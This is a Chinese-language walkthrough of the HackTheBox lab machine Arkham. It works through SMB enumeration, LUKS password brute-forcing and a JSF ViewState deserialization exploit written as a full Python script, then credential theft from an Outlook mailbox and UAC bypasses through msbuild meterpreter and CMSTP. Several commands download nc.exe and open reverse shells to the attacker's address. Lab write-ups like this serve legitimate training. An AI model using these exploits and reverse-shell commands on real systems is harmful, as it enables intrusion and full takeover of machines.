HTB靶机渗透系列之Arkham

	Arkham是一个中等难度的靶机，但是它的难度可以和困难相媲美。知识点涉及lucks镜像、密码爆破 JSF ViewState反序列化、ost邮件分析、CMSTP绕过UAC、GreatSCT绕过UAC等。感兴趣的同学可 以在HackTheBox中进行学习。 通关思维导图 0x01 侦查 端口探测 首先使用nmap进行端口扫描 nmap -Pn -p- -sV -sC -A 10.10.10.130 -oA nmap_Arkham 扫描结果显示目标开放了80、135、139、445、8080端口 80端口 80端口为 IIS 默认界面，使用 gobuster 进行目录扫描 gobuster dir -u http://10.10.10.130 -w /usr/share/wordlists/dirbuster/directory- list-2.3-small.txt -t 50 但是并没有扫描到什么有价值的目录 8080端口 页面显示这是一家名为 Mask 的公司，主要业务为数据保护。使用 gobuster 进行目录扫描 gobuster dir -u http://10.10.10.130:8080 -w /usr/share/wordlists/dirb uster/directory-list-2.3-small.txt -t 50 也没有发现什么有用的目录，查看网站可以在订阅中发现一个交互点 输入 mac 会给你一个返回信息 445端口 使用 smbclient 查看当前共享 smbclient -N -L //10.10.10.130 也可以使用 smbmap 进行扫描，但是获取到的信息并没有很多 smbmap -H 10.10.10.130 Users 查看 Users 共享 smbclient //10.10.10.130/users BatShare 查看 BatShare 共享 smbclient //10.10.10.130/batshare smb > get appserver.zip 通过对 Users 以及 BatShare 共享的探索我们发现 Users 中只存放了一些默认用户和访客用户的文件而BatShare 中包含了一个压缩包appserver.zip同时将其下载下来 lucks映像 将下载下来的压缩包解压 unzip appserver.zip 其中包含一个文本和一个加密的磁盘映像 爆破lucks密码 LUCKS 是 linux 硬盘加密的标准，如果我要访问里面的文件，必须先找到其中的密码 使用 bruteforce-luks 对密码进行爆破 apt install bruteforce-luks cat /usr/share/wordlists/rockyou.txt | grep batman > test.txt bruteforce-luks -t 10 -f test.txt backup.img -v 60 成功跑出密码为：batmanforver 挂载磁盘映像 使用 cryptsetup 打开文件 cryptsetup open --type luks backup.img arkham 查看驱动发现一个新设备 ls -l /dev/mapper/ 挂载新设备到 Arkham 目录下 mount /dev/mapper/arkham ~/hackthebox/Machines/Arkham/mnt/ 开始对目录中的文件进行枚举 find ~/hackthebox/Machines/Arkham/mnt/ -type f 其中包括蝙蝠侠的图片和 tomcat-stuff 文件夹，通过对其中各个文件的筛查，我们在 web.xml.bak 中发现了有趣的东西 根据以上配置文件我们可以在发现如下信息 该站点会匹配 *.faces 来调用 servlet myfaces 的 SECRET 为 SnNGOTg3Ni0= HmacSHA1 的 SECRET 为 SnNGOTg3Ni0= SnNGOTg3Ni0= 经过解码后为 JsF9876- JSF 版本为 2.5.2 0x02 上线[Alfred] JSF ViewState反序列化漏洞 JSF 框架主要使用序列化来保持站点的状态，它会帮助服务器序列化一个 Java 对象，并将其作为网页中的隐藏字段 发送到客户端，当客户端提交时该序列化对象被发送回服务器，服务器可以使用它来取回状态。反序列化漏洞是允 许用户提交序列化对象，如果序列化对象包含恶意代码，那么在反序列化过程中就会运行。从而用户可以控制输入 来获取执行权限。 通过以上介绍和分析 我们可以推测该站点可能存在反序列化漏洞，那么如何来验证该漏洞呢？可采取以下思路 1、测试提交错误的 ViewState 会发生什么？ 2、解密 ViewState 变量来显示我的加密密钥有效 3、构建脚本加密好的 ViewState 并进行提交 4、使用 ysoserial 来生成 payload，它可以使用脚本中的 ViewState 来 ping 主机 5、更新 payload 获取反弹shell 找到之前的订阅栏目，使用 BurpSuite 将数据包拦截，具体数据包如下 将 javax.faces.ViewState 参数的值的第一个字符从 w 字符修改为 W 字符，查看页面报错信息 返回信息提示No Saved view state could be found for the view identifier，这说明修改是有效的 探索ViewState 我们可以抓取到 javax.faces.ViewState 参数的值如下 javax.faces.ViewState=wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RQxTq LYuokmO70KtDtngjDm0mNzA9qHjYerxo0jW7zu1mdKBXtxnT1RmnWUWTJyCuNcJuxE%3D 通过 python 代码来获取其中的字节流 from base64 import b64decode from urllib.parse import unquote_plus as urldecode vs = 'wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RQxTqLYuokmO7 0KtDtngjDm0mNzA9qHjYerxo0jW7zu1mdKBXtxnT1RmnWUWTJyCuNcJuxE%3D' vs_urldecode = urldecode(vs) print(vs_urldecode) vs_bs64decode = b64decode(vs_urldecode) print(vs_bs64decode) 这是加密的字节流，我们需要通过解密来获取其中的信息。SHA1的长度通常为20字节，很可能附加到首位 或末尾经过测试 HMAC 存储在最后20字节中 from base64 import b64decode from urllib.parse import unquote_plus as urldecode from hashlib import sha1 import hmac vs = 'wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RQxTqLYuokmO70KtDt ngjDm0mNzA9qHjYerxo0jW7zu1mdKBXtxnT1RmnWUWTJyCuNcJuxE%3D' vs_urldecode = urldecode(vs) vs_bs64decode = b64decode(vs_urldecode) mac = vs_bs64decode[-20:] enc = vs_bs64decode[:-20] enc_hmac = hmac.new(b'JsF9876-', enc, sha1).digest() print(mac) print(enc_hmac) 目前已知加密方式、加密位置以及密钥，接下来就可以解密这串值 from base64 import b64decode from urllib.parse import unquote_plus as urldecode from Crypto.Cipher import DES vs = 'wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RQxTqLYuokmO70KtDtn gjDm0mNzA9qHjYerxo0jW7zu1mdKBXtxnT1RmnWUWTJyCuNcJuxE%3D' vs_urldecode = urldecode(vs) vs_bs64decode = b64decode(vs_urldecode) enc = vs_bs64decode[:-20] d = DES.new(b'JsF9876-', DES.MODE_ECB) print(d.decrypt(enc)) 经过解密后出现字符串说明解密确实是正确的 使用 ysoserial 来生成 ping 命令的 payload java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar BeanShell1 'ping 10.10.14.14' > text 生成成功，但是我需要将其放入 python 脚本当中进行调用 安装模块 pip install pycryptodome import requests import subprocess import sys from base64 import b64encode from Crypto.Cipher import DES from Crypto.Hash import SHA, HMAC from os import devnull from urllib.parse import quote_plus as urlencode with open(devnull, 'w') as null:   payload = subprocess.check_output(['java', '-jar', '/root/hackthebox/Machines/Arkham/yso serial-0.0.6-SNAPSHOT-BETA-all.jar', sys.argv[1], sys.argv[2]], stderr=null) pad = (8 - (len(payload) % 8)) % 8 padded = payload + (chr(pad)*pad).encode() d = DES.new(b'JsF9876-', DES.MODE_ECB) enc_payload = d.encrypt(padded) sig = HMAC.new(b'JsF9876-', enc_payload, SHA).digest() viewstate = b64encode(enc_payload + sig) sess = requests.session() sess.get('http://10.10.10.130:8080/userSubscribe.faces') resp = sess.post('http://10.10.10.130:8080/userSubscribe.faces',         data = {'j_id_jsp_1623871077_1%3Aemail': 'd',                 'j_id_jsp_1623871077_1%3Asubmit': 'SIGN+UP',                 'j_id_jsp_1623871077_1_SUBMIT': '1',                 'javax.faces.ViewState': viewstate}) 启动本地监听 tcpdump -i tun0 icmp 使用脚本执行 ping 命令 python3 exploit.py BeanShell1 'ping 10.10.14.14' 成功收到 ping 命令，反序列化漏洞验证成功 获取shell 为了获取目标站点的shell，我们把 nc64.exe 放在本目录下并开启 http 服务 python -m SimpleHTTPServer 80 在本地开启监听，接收反弹shell rlwrap nc -nvlp 443 这里需要在 exploit.py 进行略微修改，源码如下 #!/usr/bin/env python3 import requests import subprocess import sys from base64 import b64encode from Crypto.Cipher import DES from Crypto.Hash import SHA, HMAC from os import devnull from urllib.parse import quote_plus as urlencode with open(devnull, 'w') as null:     payload = subprocess.check_output(['java', '-jar', '/root/hackthebox/Machines/Arkh am/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar', 'CommonsCollections5', sys.argv[1]], stderr=null) pad = (8 - (len(payload) % 8)) % 8 padded = payload + (chr(pad)*pad).encode() d = DES.new(b'JsF9876-', DES.MODE_ECB) enc_payload = d.encrypt(padded) sig = HMAC.new(b'JsF9876-', enc_payload, SHA).digest() viewstate = b64encode(enc_payload + sig) sess = requests.session() sess.get('http://10.10.10.130:8080/userSubscribe.faces') resp = sess.post('http://10.10.10.130:8080/userSubscribe.faces',         data = {'j_id_jsp_1623871077_1%3Aemail': 'd',                 'j_id_jsp_1623871077_1%3Asubmit': 'SIGN+UP',                 'j_id_jsp_1623871077_1_SUBMIT': '1',                 'javax.faces.ViewState': viewstate}) 执行以下命令上传 nc 并使用 nc 连接本地443端口 python3 exploit2.py "powershell -c Invoke-Webrequest -uri 'http://10.10.14.14/nc64.exe' -ou tfile \windows\system32\spool\drivers\color\nc.exe" python3 exploit2.py "\windows\system32\spool\drivers\color\nc.exe -e cmd 10.10.14.14 443" 成功收到反弹shell，在当前用户的桌面上找到第一个flag dir C:\Users\Alfred\Desktop type C:\Users\Alfred\Desktop\user.txt 成功拿到第一个flag 0x03 权限提升[batman] 获得密码 在主目录下枚举关键文件 dir /s /b /a:-d-h \Users\alfred | findstr /i /v "appdata" 发现 backup.zip，我们需要将其下载到本地。借助 smbserver 来建立 smb 共享同时 设置账号密码，否则无法连接 python3 smbserver.py -smb2support -username mac -password mac sh are /root/hackthebox/Machines/Arkham/ 在靶机上复制 backup.zip 到本机目录下 net use \\10.10.14.14\share /u:mac mac copy C:\Users\Alfred\Downloads\backups\backup.zip \\10.10.14.14\share\ 解压该文件，里面包含一个 ost 文件，是 Microsoft Outlook 的脱机文件夹文件 unzip -l backup.zip 借助 readpst 来进行解析，该工具可以用来解析.pst、.ost文件 readpst alfred@arkham.local.ost 解压完成是一个.mbox文件，这是一种电子邮件邮箱文件格式，可在单个文件中存储多条消息 并将其作为文本。使用 mutt 来打开它 mutt -R -f Drafts.mbox 这是一封给 batman 的邮件，翻到最后存在一个附件 通过 v 来查看附件 成功获取到账号密码为batman/Zx^#QZX+T!123 获取shell 进入 powershell 来制作凭据 powershell $username = 'batman' $password = 'Zx^#QZX+T!123' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword 建立凭据后开启监听2222端口，之后执行命令以 batman 身份反弹shell Invoke-command -computername ARKHAM -credential $credential -scriptblock { cmd.exe /c "C:\w indows\system32\spool\drivers\color\nc.exe" -e cmd.exe 10.10.14.14 2222 } 成功获得shell 0x04 UAC绕过 受限环境 查看当前用户权限 net user batman 该用户拥有管理员和远程管理员权限，但是读取 root.txt 时无法访问 administrator 的桌面 dir c:\Users\administrator\Desktop type c:\Users\administrator\Desktop\root.txt 查询权限，判断当前环境为受限状态且 UAC 状态已经启用 通过本地共享读取root.txt type \\localhost\c$\users\administrator\desktop\root.txt 成功拿到第二个flag 借助msf绕过UAC读取root.txt 由于绕过大多数 UAC 都需要交互过程，使用 msf 能够有效帮助我们绕过 UAC GreatSCT UAC绕过 借助 GreatSCT 来获取一个 meterpreter 工具地址：https://github.com/GreatSCT/GreatSCT cd setup ./setup.sh 建立完成后，使用 GreatSCT.py 查看相关命令 python3 GreatSCT.py 使用 bypass use bypass 查看反弹脚本 list 使用msbuild/meterpreter/rev_tcp.py设置 tcp 监听 use msbuild/meterpreter/rev_tcp.py 设置本地IP和端口 set LHOST 10.10.14.14 set LPORT 4444 generate ##输入arkham 成功生成 arkham.xml 、arkham.rc，这两个文件有不同的作用。arkham.xml 用于在 windows 中反弹 meterpreter，arkham.rc 用于在 msf 中直接配置监听 使用 msfconsole 加载 rc 文件并设置参数 msfconsole -r arkham.rc 与此同时将 xml 文件移动到目标靶机上 cd \Users\Batman\appdata\local\temp\ net use \\10.10.14.14\share /u:mac mac copy \\10.10.14.14\share\arkham.xml C:\Users\Batman\appdata\local\temp\ 运行 msbuild 获取 meterpreter 会话 \Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \Users\Batman\appd ata\local\temp\arkham.xml 在 msf 中成功返回会话 CMSTP UAC绕过 参考文章：https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html 查看交互进程explore.exe，并将当前进程迁移到对应的进程号中 ps -S explore migrate 4824 将上面的 C-Sharp 源码命名为 Source.cs，通过 powershell 编译为 dll 文件 load powershell powershell_shell cd \Users\Batman\appdata\local\temp\ iwr -uri 10.10.14.14/Source.cs -outfile Source.cs Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "Syste m.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll" 将该 dll 加载到内存中 [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll")) 在本地开启 nc 监听，可以调用导出的函数执行反弹shell [CMSTPBypass]::Execute("C:\windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.14 7777") 在本地获取到反弹shell 查看权限以及对应flag whoami /priv dir c:\Users\administrator\Desktop type c:\Users\administrator\Desktop\root.txt 总结 smb匿名登陆后发现lucks镜像，成功爆破lucks密码后挂载该镜像，在其中查看相关配置信息。站点中存在JSF ViewState 反序列化漏洞，虽然数据是加密的，但是它提供了一个用于执行攻击的密钥从而能够成功获取用户权限，在靶机中发现zip 压缩文件，解压后是一个mbox文件，打开该邮件后发现其中存储了管理员的账号密码，通过该账号密码借助powershell 上线，成功获取管理员权限，但是其中存在UAC限制，最终可使用msf或本地共享绕过UAC拿到flag。